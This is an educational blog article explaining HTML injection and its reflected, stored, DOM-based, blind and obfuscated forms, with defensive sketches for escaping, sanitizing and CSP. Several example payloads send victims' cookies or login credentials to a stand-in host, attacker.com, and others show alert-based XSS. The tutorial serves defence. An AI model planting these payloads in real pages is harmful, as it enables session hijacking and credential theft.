HTML Injection: What Is This Vulnerability?

7 min read · Jun 21, 2023

What is HTML Injection?

HTML injection is a type of attack where an attacker exploits vulnerabilities in a website by injecting HTML code. The intention is to manipulate the website’s design or alter the information displayed to users. The attacker sends HTML code through vulnerable fields, which can result in the user seeing the injected data. Essentially, HTML injection involves injecting markup language code into a web page’s document.

The data sent during this type of attack can vary. It could be a few HTML tags that display the injected information or even a complete fake form or page. When this attack occurs, the browser often treats the malicious data as legitimate and renders it accordingly.

It’s important to note that the risks of HTML injection go beyond changing a website’s appearance. The attack is closely related to cross-site scripting (XSS): if the injected markup can carry script, the attacker can steal session data and impersonate the victim. Even without script, a fake login form injected into a trusted page can collect credentials, so identity theft is a realistic consequence of HTML injection.

Types of HTML Injection

The attack itself may appear straightforward due to the simplicity of HTML, but there are various methods and types of HTML injection attacks. These attacks can be classified based on the risks they pose. Here are some common types:

Reflected HTML Injection
Stored HTML Injection
DOM-based HTML Injection
Blind HTML Injection
Advanced HTML Injection Techniques

Reflected HTML Injection

In this type, the injected HTML code is reflected back to the user without being stored permanently on the server. It typically occurs through URL parameters or form inputs that are directly echoed back in the response. The risk lies in tricking users into executing malicious code or revealing sensitive information.

Here is an example of a payload used in a Reflected HTML Injection attack:

http://www.example.com/search?query=<html><script>alert('Vulnerable to HTML Injection!');</script></html>

In this example, the payload is injected into the “query” parameter of the search page URL. When a victim opens the crafted link, the server echoes the parameter into the response without encoding it, so the browser parses the injected markup and shows a pop-up alert with the message “Vulnerable to HTML Injection!”.
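To make the reflection concrete, here is a minimal sketch of how a search page could encode the query before echoing it. The names escapeHtml and renderSearchPage are hypothetical and not taken from any framework, and the sketch assumes the value is placed in an HTML text context (not inside an attribute, script, or URL).

```javascript
// Hypothetical helper: encode the characters that are significant in HTML.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical page renderer: the query is encoded before it is echoed back.
function renderSearchPage(query) {
  return '<p>Results for: ' + escapeHtml(query) + '</p>';
}

// The same kind of payload as in the URL above, now rendered as harmless text.
const injected = "<script>alert('Vulnerable to HTML Injection!');</script>";
console.log(renderSearchPage(injected));
```

With the encoding in place, the browser displays the payload as literal characters instead of parsing it as markup.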

Stored HTML Injection

Also known as persistent HTML injection, this attack involves injecting HTML code that is stored permanently on the server. The injected code is then displayed to multiple users when they access the affected page. It can lead to widespread exploitation and impact the reputation of the website.

The payload for a stored HTML injection typically consists of malicious HTML or JavaScript code that is embedded within user-generated content, such as comments, forum posts, or user profiles. When the vulnerable page retrieves and displays this content, the injected code is executed in the context of the victim’s browser, potentially leading to various malicious activities.

Here’s an example payload for a stored HTML injection:

<script>
  // Malicious code to steal user cookies
  const attackerUrl = 'http://attacker.com/collect.php';
  const img = new Image();
  img.src = `${attackerUrl}?cookie=${document.cookie}`;
</script>

In this payload, an attacker embeds a script tag within user-generated content. The script creates a new image element and sets its source to an attacker-controlled URL. The script then appends the user’s cookies as a parameter in the URL. When the page loads and renders the user-generated content, the image’s source is fetched, effectively sending the victim’s cookies to the attacker’s server. The attacker can then use these stolen cookies to impersonate the victim or perform other malicious actions.

This is just one example of a payload; the actual payload can vary based on the attacker’s objectives. The impact of a successful stored HTML injection attack can include session hijacking, defacement of web pages, stealing sensitive user information, spreading malware, or launching phishing attacks.

Preventing stored HTML injection requires implementing proper input validation and output encoding techniques. Web developers should sanitize user-generated content and validate it against a whitelist of allowed characters and HTML tags. Additionally, output encoding should be used when displaying user-generated content to ensure that any special characters are properly encoded and rendered as plain text rather than interpreted as HTML or JavaScript.
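The combination of an allowlist and output encoding can be sketched as follows. This is only an illustration under stated assumptions: the allowlist contents and the names ALLOWED_TAGS, encodeAll, and sanitizeComment are hypothetical, and only bare tags without attributes are restored.

```javascript
// Tags that user-generated content may keep (an assumed allowlist for this sketch).
const ALLOWED_TAGS = ['b', 'i', 'em', 'strong'];

// Step 1: encode everything so that no user-supplied markup survives.
function encodeAll(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Step 2: restore only bare, attribute-free allowlisted tags such as <b> or </b>.
function sanitizeComment(text) {
  const pattern = new RegExp('&lt;(/?)(' + ALLOWED_TAGS.join('|') + ')&gt;', 'gi');
  return encodeAll(text).replace(pattern, '<$1$2>');
}

const comment = '<b>Nice post</b><script>alert(1)</script><i onclick="x()">hi</i>';
console.log(sanitizeComment(comment));
```

The bold tags are kept, while the script element and the tag carrying an onclick attribute stay encoded. A stray closing tag can remain in the output, so a vetted sanitizer library is probably the better choice for production use.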

DOM-based HTML Injection

DOM (Document Object Model) is a programming interface for HTML and XML documents. In this type of attack, the injected code manipulates the DOM dynamically within the user’s browser, altering the webpage’s structure and behaviour. It can lead to various consequences such as unauthorized actions or data leakage.

Here’s an example payload for a DOM-based HTML injection:

// Page code: read the value of the input field with the id 'message'
const userInput = document.getElementById('message').value;

// Stand-in for attacker-supplied markup. It is hard-coded here only to show what
// the browser ends up rendering; in a real attack it would arrive through userInput.
const payload = '<img src="http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie) + '">';

// Vulnerable sink: the input is written to the DOM as markup, not as text
document.getElementById('output').innerHTML = userInput;

// Appending the stand-in payload makes the browser request the attacker's URL
document.getElementById('output').innerHTML += payload;

In this example, the page reads an input field with the id ‘message’ and writes its value into the DOM through innerHTML, which makes it vulnerable to DOM-based HTML injection. The attacker-controlled payload consists of an image tag that points to an attacker-controlled URL, with the victim’s cookie appended as a parameter. The payload is added to the DOM by updating the innerHTML of the element with the id ‘output’.

When a user interacts with the vulnerable input field and submits the form or triggers a specific event, the payload is executed within the victim’s browser. The image is loaded from the attacker’s server, which collects the victim’s cookie information, enabling the attacker to potentially perform session hijacking or other malicious activities.

Preventing DOM-based HTML injection requires a combination of secure coding practices and input validation.

Input validation: Validate and sanitize any user input before using it in DOM manipulation to ensure it does not contain malicious code or unexpected characters.
Contextual output encoding: When dynamically adding user input to the DOM, use appropriate encoding mechanisms based on the context. For example, use textContent instead of innerHTML to insert plain text, or sanitize user input with a library that escapes HTML characters.
Strict Content Security Policy (CSP): Implement a strict CSP that restricts the execution of inline scripts and limits the sources from which scripts can be loaded, reducing the risk of code injection.
Regular security updates: Keep web browsers and client-side libraries up to date to benefit from the latest security patches and protections against DOM-based HTML injection.
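Two of the measures above can be sketched in a few lines. The function names showMessage and buildCspHeader are hypothetical, the policy is only an assumed starting point, and a plain object stands in for the DOM element so that the sketch also runs outside a browser.

```javascript
// Writes user input as text. Assigning to textContent never parses markup,
// so tags in the input are shown literally instead of being rendered.
function showMessage(outputElement, userInput) {
  outputElement.textContent = String(userInput);
}

// Builds an example Content-Security-Policy header value.
// The directives are an assumed baseline and should be adapted per site.
function buildCspHeader() {
  return [
    "default-src 'self'",
    "script-src 'self'",
    "object-src 'none'",
    "base-uri 'self'",
  ].join('; ');
}

// In a browser this would be document.getElementById('output').
const outputStandIn = { textContent: '' };
showMessage(outputStandIn, '<img src="x" onerror="alert(1)">');
console.log(outputStandIn.textContent);
console.log(buildCspHeader());
```

Because script-src does not include 'unsafe-inline', a policy like this one blocks inline scripts and inline event handlers, which limits what injected markup can do even if it reaches the page.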

Blind HTML Injection

This type of attack is characterized by the absence of immediate feedback or visible effects of the injected code. The attacker doesn’t directly observe the results but expects them to affect other users or the system itself.

The payload for blind HTML injection typically aims to exploit the vulnerable application by injecting code that sends data to the attacker’s controlled server or performs other actions that are not immediately visible to the attacker. Here’s an example payload for blind HTML injection:

<!-- Beacon: the browser requests this URL as soon as the injected markup is rendered -->
<img src="http://attacker.com/collect.php?data=rendered">
<script>
  // Malicious code to steal user credentials (runs only if injected scripts can execute)
  const victimForm = document.getElementById('loginForm');
  const username = victimForm.username.value;
  const password = victimForm.password.value;

  // Send stolen credentials to the attacker's server
  const xhr = new XMLHttpRequest();
  xhr.open('GET', 'http://attacker.com/steal?username=' + encodeURIComponent(username) + '&password=' + encodeURIComponent(password));
  xhr.send();
</script>

In this example, the payload has two parts. The image tag acts as a beacon: when the vulnerable page renders it, the victim’s browser requests the attacker’s URL, which tells the attacker that the injection worked even though they never see the page. The script targets a login form with the id ‘loginForm’ and reads its ‘username’ and ‘password’ fields. A script cannot run from inside an image’s source attribute, so it is injected as a separate element, and it executes in the victim’s browser context only if the page lets injected scripts run. In that case it reads whatever values the fields hold at that moment and sends them as parameters in a GET request to the attacker’s controlled server.

The attacker’s server can collect the stolen credentials for further exploitation or unauthorized access to user accounts. Since the attacker cannot directly observe the results, they might rely on other techniques to confirm the successful execution of the payload, such as checking server logs or attempting to use the stolen credentials.

Advanced HTML Injection Techniques

Attackers may employ advanced techniques to evade detection or enhance the impact of their HTML injection attacks. This can include obfuscating the injected code, leveraging specific vulnerabilities in web application frameworks, or combining HTML injection with other attack vectors, such as cross-site scripting (XSS) or SQL injection.

Obfuscated Payloads

Attackers can obfuscate their injected code to make it harder to detect and to slip it past security controls. They may use techniques like character encoding, string concatenation, and code obfuscation tools to disguise the payload. For example:

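// Percent-encoded form of: <img src="x" onerror="alert('XSS')">
var payload = "%3Cimg%20src%3D%22x%22%20onerror%3D%22alert('XSS')%22%3E";
// decodeURIComponent() restores the markup; an img handler is used because script tags added through innerHTML do not run
document.getElementById("output").innerHTML = decodeURIComponent(payload);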
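Encoded payloads like the one above are the reason pattern-matching filters tend to be unreliable. The sketch below compares a naive blocklist check with encoding on output; passesNaiveBlocklist and encodeOutput are hypothetical names, and the percent-encoded input is just one of many possible encodings.

```javascript
// A naive filter that only looks for a literal "<script" substring.
function passesNaiveBlocklist(input) {
  return !String(input).toLowerCase().includes('<script');
}

// Encoding on output: whatever the decoded value is, it is rendered as text.
function encodeOutput(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

const encodedInput = '%3Cscript%3Ealert(1)%3C%2Fscript%3E';
const decodedInput = decodeURIComponent(encodedInput);

console.log(passesNaiveBlocklist(encodedInput)); // the encoded form slips past the filter
console.log(passesNaiveBlocklist(decodedInput)); // the decoded form would have been caught
console.log(encodeOutput(decodedInput));         // encoded on output, it stays inert
```

The filter only sees the payload in one representation, while output encoding is applied to the final value right before it reaches the page, whatever encoding the attacker used on the way in.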

Polyglot Payloads

Polyglot payloads are malicious code that can be interpreted as multiple languages or file types. Attackers use them to exploit vulnerabilities in different components of a web application. Real polyglots are crafted to stay valid in several parsing contexts at once; the following simplified example only shows a string that mixes HTML markup with JavaScript:

<script>
    var payload = '<img src="x" onerror="javascript:alert(\'XSS\')">';
    document.getElementById("output").innerHTML = payload;
</script>

Framework-Specific Exploits

Attackers may leverage specific vulnerabilities or weaknesses in popular web application frameworks to perform HTML injection attacks. This can include exploiting template injection vulnerabilities, misusing template engines, or manipulating server-side rendering processes. These techniques require in-depth knowledge of the targeted framework.
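Many template engines guard against this by encoding interpolated values by default, and injection tends to appear when that encoding is bypassed or switched off. The idea can be sketched with a tagged template literal. This is not the API of any real framework: safeHtml and encodeValue are hypothetical names used only for illustration.

```javascript
// Hypothetical encoder applied to every interpolated value.
function encodeValue(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Tagged template: the literal parts written by the developer are trusted,
// while every interpolated value is encoded before it is joined in.
function safeHtml(strings, ...values) {
  return strings.reduce((result, part, index) => {
    const value = index < values.length ? encodeValue(values[index]) : '';
    return result + part + value;
  }, '');
}

const displayName = '<img src="x" onerror="alert(1)">';
console.log(safeHtml`<p>Hello, ${displayName}!</p>`);
```

The paragraph tags from the template survive, while the markup inside displayName is turned into text. Concatenating the same value into the string by hand would skip the encoding, which is the kind of misuse described above.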

HTML Injection with XSS

Attackers may combine HTML injection with cross-site scripting (XSS) techniques to enhance their attacks. When the injected markup can include event-handler attributes or script elements, the HTML injection escalates into XSS. This allows the attacker to execute arbitrary JavaScript code and perform various malicious actions. For example:

<img src="x" onerror="alert(document.cookie)">

HTML Injection with SQL Injection

In some cases, attackers may combine HTML injection with SQL injection to perform more advanced attacks. They may inject malicious code that manipulates the underlying database or executes arbitrary SQL queries. This technique can result in data exfiltration, unauthorized access, or further exploitation of the application’s vulnerabilities.

It’s important for developers and security professionals to stay up-to-date with the latest attack techniques and regularly test web applications for vulnerabilities. Employing secure coding practices, input validation, output encoding, and security testing can help mitigate the risk of advanced HTML injection attacks.

Thanks for reading. I hope you now understand what HTML injection is and how it can cause damage.